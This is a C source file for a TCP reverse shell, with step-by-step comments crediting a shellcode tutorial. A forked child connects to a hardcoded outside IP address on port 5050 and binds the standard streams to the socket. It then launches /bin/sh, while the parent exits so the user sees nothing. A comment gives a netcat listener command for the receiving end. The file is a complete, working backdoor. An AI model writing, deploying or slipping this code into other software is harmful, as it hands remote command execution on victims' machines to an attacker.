#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>

/* Source from: https://mmquant.net/creating-tcp-reverse-shell-shellcode/ */
/* To try in local networks: nc -nvl 5050 */

int main() {

  /* 1) Spawn new child prozess to hide functionality */
  if (fork() == 0) {
    /* -- CHILD -- */

    /* 1) Call to socket() creates a connection socket(1) and returns file
     * descriptor(2) which identifies this socket later on. First argument
     * selects the protocol family which will be used for communication AF_INET
     * stands for IPv4 Internet Protocols. Second argument specifies the
     * communication semantics SOCK_STREAM is full-duplex byte stream supported
     * by AF_INET family. Third argument is specific protocol defined in
     * /etc/protocols. */
    int connect_socket_fd = socket(AF_INET, SOCK_STREAM, 0);

    /*3) Setup remote information such as the destination Port and IP address.
     *   Note: htons() converts the host byte order to the network byte order
     *   See:
     * https://stackoverflow.com/questions/19207745/htons-function-in-socket-programing
     */
    struct sockaddr_in remoteAddr;
    remoteAddr.sin_family = AF_INET;
    remoteAddr.sin_port = htons(5050); /* 0x13BA -- 0xBA13 */
    remoteAddr.sin_addr.s_addr =
        inet_addr("45.84.199.103"); /* Use 127.0.0.1 in local networks */

    /* 4)  Call to connect() initiates a connection on a socket.
     *     First argument is file descriptor from socket() call.
     *     Second argument is structure with protocol family, port and IP.
     *     Third argument is just size of sockaddr_in structure in bytes. */
    connect(connect_socket_fd, (struct sockaddr *)&remoteAddr,
            sizeof(remoteAddr));

    /* 5) dup2() call binds current process stdin, stdout, stderr file
     * descriptors with connected socket file descriptor hence any data from
     * outside coming into connected socket are treated as stdin. Similarly any
     * data generated by current process which would go to stdout or stderr go
     * out to the connected socket. */
    dup2(connect_socket_fd, STDIN_FILENO);
    dup2(connect_socket_fd, STDOUT_FILENO);
    dup2(connect_socket_fd, STDERR_FILENO);

    /* 6) Call to execve() system call spawns shell in current process.
     *    First argument is path to executable.
     *    Second argument points to executable arguments
     *    Third argument points to environment variables. */
    execve("/bin/sh", NULL, NULL);
  }
  /* -- PARENT -- */
  /* Close parents terminal without any interaction of the user */
  exit(0);
}
